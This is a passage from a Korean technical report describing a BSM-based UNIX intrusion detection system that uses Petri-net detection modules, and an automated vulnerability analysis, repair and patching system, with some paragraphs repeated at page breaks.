336 시스템호출로거는 BSM을사용한다. BSM에서지원하는인터페이스와로깅방법을사용하며, 침입탐지에필요한 BSM에서지원하지않는내용은프로그램으로구현한다. BSM에서지원하는방법은부록에나와있다. audit 명령어는감사추적파일을관리하는일반적인관리자인터페이스이다. audit_control 파일에는감사조건이저장된다. auditd는데몬프로그램으로 audit-control 파일의내용을읽어서감사의새로운조건을선택하고감사추적파일이저장될경로를지정하여로깅을수행한다. 관리자는 audit라는명령어를사용하여 auditd 프로그램의동작을제어한다. 또한, audit_config 명령어를사용하여감사조건을변경할수있다. 감사추적파일은로그파일로서 audit-control에명시된경로에파일이생성된다. 감사추적파일에는감사레코드를기록하는데, 각레코드는감사토큰으로이루어진다 ( 그림 J-17) 는감사추적파일에서기록하는토큰의종류이다. 일반적으로시스템호출을로깅하는방법에는몇가지문제점이있다. 첫째, 하나의프로그램에서는시스템호출이여러번일어나기마련이다. 즉, 로그파일이기하급수적으로커진다는말이다. 이것은시스템에커다란제약사항이될수있다. 둘째, 시스템호출을로깅함에따라시스템성능저하가발생할수있다. 이러한문제를위하여감사기록할내용을선별하여필요한시스템호출만을기록할수있도록하고있다. 2 탐지모듈생성기침입탐지에이용할모듈을생성하는프로그램이다. 먼저명령어이름을이용한해쉬함수를시스템호출번호에따른해쉬함수로변경한다. 그리고명령어매개변수와사용권한에따른비교조건을시스템호출에관련된파일의권한등의특성을이용하는방법으로변경한다. 이프로그램은새로운패턴이발견될때마다입력하여새로운모듈을생성할수있도록동작된다

337 [ 표 J-6] 탐지모듈생성기의 Yacc 문법 o 침입패턴침입패턴은탐지모듈을생성하기위한중요자료가된다. 본연구에서는침입패턴을정형화하여규칙적인탐지모듈이생성되도록하고있다. 침입패턴형식을 Yacc( 구문분석기 ) 문법으로표기한내용은 [ 표 J-6] 같다. [ 표 J-6] 같은형식의입력패턴은 Petri-Net 형태의침입탐지모듈로변경된다. Petri-Net의플레이스는침입단계를의미하고트랜지션은패턴에따라토큰의진행여부를결정한다. 위문법에서 <condition> 부분이토

338 큰의진행을결정하는부분이다

339 o 침입탐지모듈구조침입탐지모듈에맞게구성한 Petri-Net의자료구조는아래와같다. [ 표 J-6] 형식의패턴이입력되면위와같은자료구조에맞추어탐지모듈이생성된다. ( 그림 J-18) 에서보듯이 a { b c; } e 의패턴은 ( 그림 J-18-a) 와같은 Petri-Net 구조를갖게된다. 탐지모듈생성기에서는입력패턴을 ( 그림 J-18-b) 와같은구조로생성하여실제침입탐지기에서이용할수있도록한다. ( 그림 J-18) 패턴의 Petri-Net 구성과자료구조표현

340 3 침입탐지기로그파일과탐지모듈을근거로하여침입을판정하는중심프로그램이다. 탐지모듈생성기에서입력패턴을탐지모듈로변환시킨다. 침입탐지기에서는이모듈을사용하여실시간에침입탐지를수행한다. 실시간에이루어져야하기때문에로그파일을읽어탐지모듈에적용함으로써탐지결과를바로알수있도록하였다. 탐지모듈을 Petri-net 구조의해쉬함수로구현하여탐지상황의표시와실시간처리가가능하도록하였다. 입력패턴에따라다른처리함수를갖고있으며, 그함수의주소를해쉬로저장한다. 침입의판정은탐지패턴 Petri-net의종료플레이스값으로한다. 침입이진행됨에따라탐지패턴 Petri-net의종료플레이스에가깝게토큰이진행되며그퍼지값이상승한다. 따라서종료플레이스값이임계치이상이될때침입으로판정하게된다. 침입으로판정되면침입탐지기에서는해당프로세스에바로 KILL 신호를보낸다. 또한침입상황을침입상황표시기로전달하여관리자가쉽게관리할수있도록한다. 4 침입상황표시기탐지결과에따라웹브라우져에서표시할수있도록하는프로그램이다. 먼저, 텍스트형태로구현하고이를웹브라우져에서볼수있는형태로구현하였다. 이러한침입상황표시기는침입탐지모듈에서결과로기록한내용을기반으로동작한다. 침입상황표시기는 Java 언어로구현되었다. 침입상황표시기는침입탐지시스템과소켓을통하여연결된다. 스레드를사용하여침입탐지시스템으로부터자료를받아화면을계속해서갱신시킨다. 자료교환은실시간으로이루어진다. 만약침입상황이발생하면그래프로표시하고경고메시지로알려준다

( 그림 J-19) 침입상황표시기화면 ( 그림 J-19) 에서볼수있듯침입탐지시스템과연결시키는버튼이화면상단에있고가운데에는패턴종류와현재진행상황도가그래프로그려진다. 아래영역은침입패턴에관련된시스템호출내역이출력된다. 5 시스템성능평가본시스템은 Petri-net 정보를유지하기위하여플레이스를저장한다. 플레이스는고정메모리를사용하므로실제적인메인메모리증가는없다.

341 ( 그림 J-19) 침입상황표시기화면 ( 그림 J-19) 에서볼수있듯침입탐지시스템과연결시키는버튼이화면상단에있고가운데에는패턴종류와현재진행상황도가그래프로그려진다. 아래영역은침입패턴에관련된시스템호출내역이출력된다. 5 시스템성능평가본시스템은 Petri-net 정보를유지하기위하여플레이스를저장한다. 플레이스는고정메모리를사용하므로실제적인메인메모리증가는없다. 즉, 프로그램공간과데이터공간이모두고정적인크기를갖게된다. 다만문제가되는것은로그파일의크기이다. 본시스템에서사용하는로깅시스템에서는시스템호출내용을기록하였다. UNIX에서하나의명령어를내리면관련된시스템호출이많이일어난다. 그러므로로그파일의크기가엄청나게커진다는단점이있다. 결국시스템성능을결정하는부분에서로그파일을얼마나줄이는가에큰비중이있다. 로그파일의크기를줄이는방법은주기적으로로그파일을변경하며오래된로그파일은삭제하는방법과꼭필요한시스템호출만기록하는방법이다. 첫번째경우는 cron 작업으로처리하고, 두번째경우는 audit_user와 audit_class 파일의설정내용을변경하여로그파일의크기를줄일수있다. 또한, 침입에직접관련이있는정보는침입상황표시기에보내어시스템보안관리에이용할수있도록하였다

342 시스템성능을결정하는다른요소는 CPU 사용량이다. 본시스템은다른응용프로그램과동등한위치에서수행된다. 따라서 CPU를점유하는비율은다른프로그램의경우와다르지않다. 그리고입출력작업의경우는로그파일과관련이있다. 다른프로그램의실행이있을때만시스템호출이일어나고, 그때마다로그파일에기록된다. 따라서본시스템이로그파일을읽는입출력작업역시다른프로그램과연관된다. 본시스템은실시간으로정보를처리하고침입을탐지한다. 실시간처리를위해서탐지모듈적용에함수주소를기억하여직접접근하는방식을사용하였다. 다른응용프로그램과동등한위치에서 CPU 경쟁을하므로침입탐지가실시간에이루어질수있는지문제가제기되지만, 본시스템에서는침입상황이임계치이상이되면침입에관련된프로세스를강제종료시킴으로서미리방어할수있도록하였다. 현재는알려진침입형태 11 가지를탐지패턴으로입력하여모두탐지가능하다. 기타다른침입형태역시언제든지추가가능하도록하여확장성을두었다

343 J4. 정보시스템보안취약점자동복구기술 1. 개요세계는인터넷이라는거대한통신망에연결되어자원과정보를공유하게되었다. 최근에는정부기관, 학교, 연구소, 기업체에서개인에이르기까지컴퓨터와통신망이보급되어단순히자원과정보의공유만이아니라홈뱅킹, 전자상거래등통신을통한사용자서비스가증가하고있다. 이러한정보화사회의역기능으로서통신망에연결된시스템에대한불법적인침해사고또한증가하고있으며, 이에대한대책이시급한실정에있다. 최근에는해킹을통한불법적인정보의유출이나금융사고등의범죄가더욱잦아지고지능화되고있다. 또한대학이나연구소, 회사등의시스템도많은공격의대상이되고있다. 이러한사고를방지하기위하여여러가지물리적, 기술적, 관리적인보안대책이마련되어야한다. 통신망에데이터가전송되는상황에서비밀성, 무결성, 인증등의기술적인문제도중요한문제이나통신망에연결된시스템즉, 통신망과인터페이스의역할을하는통신서버의관리문제또한매우중요한문제로부각되고있다. 이러한시스템을관리하는관리자의역할은매우중요하며, 시스템관리상의부주의또는오류로인하여공격의단서를제공할수있는경우를흔히발견할수있다. 통신망에연결되어있는시스템의보안상태를주기적으로점검하여공격에취약한부분을보완하여주는일은공격에대한방어를위하여가장기본적이며중요한일이다. 그러나아무리부지런한관리자라고해도보안상취약점을전부인지하고이에대한보완을지속적으로시행하는것은상당히어려운일이다. 그러므로관리자의수작업에의한취약점분석작업보다는자동화된도구에따라취약점을분석하고이에대한참고자료를얻을수있도록하는것이중요하다. 이러한취약점분석작업을자동화하는도구는시스템의안전성을높이는데많은기여를할것이다. 정보시스템보안취약점자동복구기술은정보시스템의보안취약점분석및복구를자동화할수있는기술이다

344 2. 개발목적및배경정보시스템보안취약점자동복구시스템은보안취약점을자동분석하고이를복구하므로써정보시스템의안전한운영을도모하기위하여개발되었다. 현재까지보안취약점을진단하는제품이나공개소프트웨어는많이볼수있지만발견된취약점을자동으로복구해주는보안취약점자동복구라는분야에대한연구는거의전무한상태이다. 보안취약점자동복구시스템의기본이될수있는보안관리, 점검, 분석시스템에대해먼저살펴보고다음절에서자동복구시스템의방향과전망을제시하도록하겠다. [ 표 J-7] 은지금까지개발된대표적인보안관리및점검도구들이다. [ 표 J-7] 대표적인보안관리, 점검도구 보안도구 SafeSuite(ISS), SATAN, Saint OmniGuard(Axent) COPS, Tiger 시큐어닥터 2.0 기능전산망보안취약점종합분석기능전산망보안관리기능시스템취약성분석기능통합적인시스템취약성분석도구 현재까지의대표적인보안관리시스템의가장큰단점들을살펴보면다음과같이요약할수있다. 계속적인추가모듈의개발이이루어지지않아최근의보안취약점에대해서는대응책이결여되어있다. 점검의결과는단지취약점이있는지의여부만판단하여경고하여줄뿐, 이에대한복구는관리자가수작업으로복구를수행하여야하므로시스템관리자의사전지식이나관리도구에대한이해에따라시스템의보안성에상당한차이가있을수있다. 각각의유닉스계열과버전에따라나타나는특정버그나보안취약점들에대한대응책이없다. 시스템의보안취약점들을확인하고발견된시스템의버그와네트워크프로토콜버그, 또는구성상의오류와같은보안취약점들을하나씩해결하는방법과병행하여, 시스템의보안취약점을획기적으로최소화하기위하여두가지접근방법을사용하였다

345 첫째, 시스템관리자의관리오류나경험미숙에의해발생할수있는관리적보안취약점에대해자동으로복구하는방법이다. 관리적보안취약점은사용자패스워드취약점, 파일전송환경취약점, 사용자환경취약점, 관리자환경취약점, 네트워크환경취약점등관리부주의에의해발생하는보안취약점을분석하여이를자동으로복구할수있도록한다. 둘째, 각운영체제개발업체에서제공하는보안패치들을신속히설치하는것이다. 앞으로나타나는모든버그와보안결점에대해신속하게해결책을제시할수있다면해당되는문제점들을하나씩해결하는것도좋은 보안취약점자동복구시스템 이라할수있겠지만, 개인용 PC의바이러스예방프로그램과는달리, 서버급 UNIX 운영체제에있어서사후표본모집과이를통한예방은구현이어려우며, 따라서이를보완할방법이필요하다. 따라서이러한문제점들을근본적으로해결하는대안으로각각의유닉스운영체제공급업자들 (Vendor) 들이제공하는공식패치 (Official patch) 를이용하는방법을고안하였으며, 지속적인자동복구시스템의개발과지원을위해공식패치서버에지속적으로접근하여, 가장최신패치들을신속하게시스템에적용할수있는알고리즘을개발하기에이르렀다. 3. 보안취약점자동복구시스템설계여기서유닉스보안취약점자동복구시스템을앞절에서살펴본기존의보안도구의많은한계점들을극복할수있는진정한시스템보안의근본적인해결방안으로제시하려고한다. 물론, 기존의시스템버그와네트웍프로토콜버그를비롯하여앞으로나타나는모든버그와보안결점에대해신속하게해결책을제시할수있다면해당되는문제점들을하나씩해결하는것도좋은보안취약점자동복구시스템이라할수있겠지만, PC의바이러스백신프로그램과는달리, 서버급유닉스운영체제에있어서사후표본모집과이를통한예방은그리권할만한해결방법이라할수없을것이다

이러한문제점들을근본적으로해결하기위하여설계된유닉스보안취약점자동복구시스템은시스템취약성점검모듈을이용한보안취약점자동분석시스템과취약점발견즉시정책에따라복구할수있는자동복구시스템, 그리고각각의유닉스운영체제공급업자들 (Vendor) 이제공하는공식패치 (Official patch) 를신속하게시스템에적용할수있는자동패치시스템을결합한통합적인보안취약점자동복구시스템이다. 가.

346 이러한문제점들을근본적으로해결하기위하여설계된유닉스보안취약점자동복구시스템은시스템취약성점검모듈을이용한보안취약점자동분석시스템과취약점발견즉시정책에따라복구할수있는자동복구시스템, 그리고각각의유닉스운영체제공급업자들 (Vendor) 이제공하는공식패치 (Official patch) 를신속하게시스템에적용할수있는자동패치시스템을결합한통합적인보안취약점자동복구시스템이다. 가. 보안취약점자동복구시스템구조 ( 그림 J-20) 과같이보안취약점자동복구시스템은취약성점검, 자동복구, 자동패치의통합적인복구시스템의형태를하고있으며편리한사용자인터페이스와점검과복구모듈추가의용이성, 그리고반영구적으로사용가능한자동패치시스템에이르기까지완전한시스템이라고할수있을것이다. ( 그림 J-20) 보안취약점자동복구시스템전체구성도 본시스템은크게세가지의다음과같은시스템으로구성되어있다. 유닉스보안취약점자동분석시스템 유닉스보안취약점자동복구시스템 유닉스보안취약점자동패치시스템

347 나. 유닉스보안취약점자동분석시스템분석시스템은유닉스시스템의환경설정및구성상의취약점, 사용자계정취약점등시스템관리상의보안취약점을점검한다. 유닉스보안취약점자동분석시스템은패스워드취약성진단, 파일전송프로토콜취약성진단, 사용자환경취약성진단, 관리자환경취약성진단, 네트워크취약성진단의크게 5가지진단그룹으로구성되어있으며각그룹마다세부점검모듈들을포함하고있다. 또한 14개의세부점검모듈은 47개의세부점검항목들을포함하고있어서시스템내의거의모든취약점을점검할수있다. 유닉스보안취약점자동분석시스템은다음과같은특징을갖는다. 점검을수행하기전에점검하게되는항목과취약점의위험성등을충분히설명해주어사용자의보안지식에도많은도움이된다. 보안취약점점검을수행하면진단결과와함께시스템의상태에따라경고와조치사항들을자세히알려준다. 보안취약점점검결과는위험수준에따라경보를달리하고있어취약성정도를파악하기용이하다. 최근국내에서발생한정보시스템의침해사례를분석하여취약점점검기능에반영하여구현되었다. 시스템은사용의편리성을도모하기위하여뛰어난그래픽사용자인터페이스를제공한다. 다. 유닉스보안취약점자동복구시스템유닉스보안취약점자동복구시스템은보안취약점자동분석시스템에서분석한취약점들에대하여자동으로복구해주는기능을제공한다. 취약점의유형에따라다음과같은다양한복구방법들이사용되었다

348 [ 표 J-8] 취약점복구유형별세부복구방법예 취약점복구유형 완전자동복구 사용자대화식자동복구 사용자대화식수동복구 경고메일보내기 자세한복구방법설명 단순경고메시지출력 o 취약한파일삭제 & 수정 o 취약한서비스차단 & 제한 o 모드, 소유자, 권한수정등 세부복구방법예 o 취약한파일의일부수정 o 원하는모드, 소유자, 권한으로수정등 o 제시되는순서에따라사용자가따라하면복구가이루어지는수동복구 o 일반사용자와관련된취약점이발견되면사용자에게자동으로메일을보내경고를하고복구방법또한알려줌 o 복구에대한충분한정보를사용자에게전달할수있는복구방법설명 o 발견된취약점에대하여단순히경고메시지만을출력해주는방법 위와같이다양한복구방법들은취약점유형에따라세부복구정책들을설정해주어야만복구가수행될수있다. 기본적으로시스템은복구정책을포함하고있으며이정책은보안상가장안정적인수준으로시스템을만들어주는정책으로구성되어있다. 복구정책은사용되는유닉스시스템의목적에따라사용자가복구시스템에서재설정하여사용할수있다. 복구정책은크게 H( 고수준 ), M( 중간수준 ), L( 저수준 ) 의 3가지수준으로구성되어있다. H : 시스템의보안취약점을완전히없애는수준, M : 기본적인자동복구 & 사용자대화형복구수준 ( 권장 ) L : 단순한경고조치나복구방법설명의수준사용자가설정한복구정책들은파일로저장할수있으며사용자에필요에따라저장된정책파일을다시읽어들여서사용할수있다. 사용기관의특성과보안수준에따라복구정책파일을 H 수준의정책파일, M 수준의정책파일, L 수준의정책파일로나누어기본이되는정책을파일로만들어사용할수있을것이다

349 복구정책의설정과자동복구의과정은편리한그래픽사용자인터페이스와단계별로자세한설명이제공되므로보안에대한많은지식이없는사용자도쉽게사용할수있도록설계되었다. 하지만보안취약점자동복구시스템은유닉스시스템의중요파일들과보안관련정보들을다루는경우가있기때문에만약의경우발생할수있는문제 ( 시스템운용목적상불가피하게설정된보안취약점의복구 ) 에대한책임을질수있는시스템관리자가직접사용하는것이좋을것이다. 또한모든복구항목들에대해서는필요에따라복구를취소하고복구전의상태로돌아가도록하는루틴이포함되어있으므로취약점자동복구시스템은상당히안정적이라고할수있을것이다. 라. 유닉스보안취약점자동패치시스템유닉스보안취약점자동패치시스템의기본프로토타입은바로운영체제공급업체가보안결점발생시가장신속하게공식지원서버를통해제공하는공식패치 (Official Patch) 를자동으로가장신속하고정확하게시스템에설치하는것을기본으로한다. 또한, 서브넷내에여러대의유닉스시스템이존재할경우를위해하나의마스터서버 (Patch Station) 를두어, 작게는프록시 (Proxy) 서비스에서크게는여러유닉스시스템들을통제할수있는통제서버의기능을띄게끔하며, 반대로클라이언트로서의역할을다하는 Agent 시스템들 (Patcher) 은마스터서버 (Patch Station) 로부터필요한공식패치들을전송받아시스템에올바르게설치하는기능을띄도록한다

350 ( 그림 J-21) 보안취약성자동패치시스템구조 유닉스보안취약점자동패치시스템 (Master/Agent) 의기본구조는 ( 그림J-21) 와같으며, 특별히마스터서버를가리켜 Patch Station 이라하며, Agent 시스템을가리켜 Patcher" 라한다. ( 그림 J-21) 에서볼수있듯이, Patch Station은프록시기능뿐만이아니라, 서브넷내의여러클라이언트들의상황을모니터링할수있으며, 추후클라이언트의동작까지제어할수있는기능을추가하여유닉스시스템군 ( 群 ) 에대한자동복구시스템을지원할수있다. 각각의클라이언트 (Patcher) 들은 Patch Station으로부터필요한패치정보를안전하게다운받은뒤이를시스템에신속하고정확하게적용하는것이기본기능이라할수있다. 마스터서버를운영하는경우얻는잇점은크게두가지가있다. 마스터는 Proxy(Cache) 역할을하므로한정된네트웍 bandwidth를효과적으로관리할수있다

351 이문제는그리중요한요소가아니라생각될수있으나, 한조직에수많은유닉스시스템이존재하며, 이들이동시에보안취약점복구를위해패치서버에접속할경우상황은매우악화될수있다. 즉, 마스터서버가일괄적으로다운받아둔패치정보들을여러 Agent 시스템들이함께이용할수있으므로 Proxy로서의기능을십분발휘할수있는것이다. 마스터서버를이용한일괄다운작업과 Agent와의자동화된통신모듈을이용해신속한패치의업데이트를보장할수있게된다. 4. 보안취약점자동복구시스템구현 가. 유닉스보안취약점자동분석시스템 보안취약점자동복구시스템 은자동복구를수행하기위하여먼저보안취약점들을정확히점검해서현재시스템에존재하는취약점과그취약점의복구방법에대한충분한이해가필요할것이다. 이절에서는유닉스시스템을 14개의점검모듈 (47개의세부점검항목을포함 ) 을이용하여정확한점검을수행하는보안취약점점검시스템에대하여살펴보겠다. 유닉스보안취약점자동복구시스템은시스템에존재하는보안취약점을찾아내어이를자동으로복구하므로시스템의주요구성파일을수정하거나삭제할수있다. 따라서자동복구시스템의운용은반드시시스템관리자나보안관리자에의해서이루어져야하며이를위해서는사용자인증과정이필수적이다. ( 그림 J-22) 은보안취약점자동복구시스템에접근하기위한사용자인증창이다

352 ( 그림 J-22) 사용자인증화면 정당한사용자에의한사용자인증과정이성공하면아래와같이시스템초기화면이나타난다. ( 그림 J-23) 시스템의초기화면

353 시스템의기본화면구성을살펴보면크게점검항목선택을위한항목리스트와점검항목에대한정보를알려주는 Text, 점검된결과를출력해주는 Text, 시스템수행을위한 Toolbar, 시스템의점검된결과상태를알려주는신호등 Image로구성되어있다. 점검을위해서는 option menu에서진단그룹을선택하고진단항목들이나타나면원하는항목에대한점검을시작한다. 실제적으로점검을수행하면다음과같이점검이이루어진다. ( 그림 J-24) 점검수행결과화면 나. 유닉스보안취약점자동복구시스템점검된결과취약성이발견되면복구를위하여먼저정책설정버튼을눌러서아래의정책설정화면에서정책을설정하여준다

354 ( 그림 J-25) 복구정책설정화면 각각의점검항목들은세부점검항목들을포함하고있는데이들의정책을시스템관리자가자신의시스템에맞도록조절해사용할수있다. 정책은크게 H( 고수준 ), M( 중간수준 ), L( 저수준 ) 의 3가지 Level로구성되어있다. H는시스템의 Security hole을완전히없애는수준 M은기본적인자동복구 & 사용자대화형복구수준 ( 권장 ) L은단순한경고조치나복구방법설명의수준으로이루어져있다. 기본적으로시스템은 Default 정책을가지고있으며이는권장할만한정책들을충분히검토한후에결정하여설정한것이다. 설정된복구정책에따라발견된보안취약점의복구가완료되면아래와같이복구완료확인화면이나타난다

( 그림 J-26) 복구완료확인화면 자동복구라는의미에서큰의미를갖지만복구에대한신중한고려없이수행하면시스템의목적에따라임의적으로설정한취약점까지도모두복구될수있다. 따라서사용자의시스템에대한충분한이해가필요한데실수로인한잘못된복구에대비하여복구를취소할수있는기능을추가하여안전성을더하였다.

355 ( 그림 J-26) 복구완료확인화면 자동복구라는의미에서큰의미를갖지만복구에대한신중한고려없이수행하면시스템의목적에따라임의적으로설정한취약점까지도모두복구될수있다. 따라서사용자의시스템에대한충분한이해가필요한데실수로인한잘못된복구에대비하여복구를취소할수있는기능을추가하여안전성을더하였다. 또한, 자동복구는시스템에영향을줄수있으므로이시스템을수행하는사용자는그점검과복구에대한항목을기록하여보관할필요성이있다. 이를위하여현재까지수행된시스템의복구정보와실행정보를확인할수있는 History log 파일을유지한다. 다. 유닉스보안취약점자동패치시스템유닉스보안취약점자동패치시스템의기본프로토타입은바로운영체제공급업체가보안결점발생시가장신속하게공식지원서버를통해제공하는공식패치 (Official Patch) 를자동으로가장신속하고정확하게시스템에설치하는것을기본으로한다. 또한, 서브넷내에여러대의유닉스시스템이존재할경우하나의 Master서버 (Patch Station) 를두어, 작게는프록시 (Proxy) 서비스에서크게는여러유닉스시스템들을통제할수있는통제서버의기능을띄게끔하며, 반대로클라이언트로서의역할을다하는 Agent 시스템들 (Patcher) 은 Master 서버 (Patch Station) 로부터필요한공식패치들을전송받아시스템에올바르게설치하는기능을띄도록한다

모두 보기

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고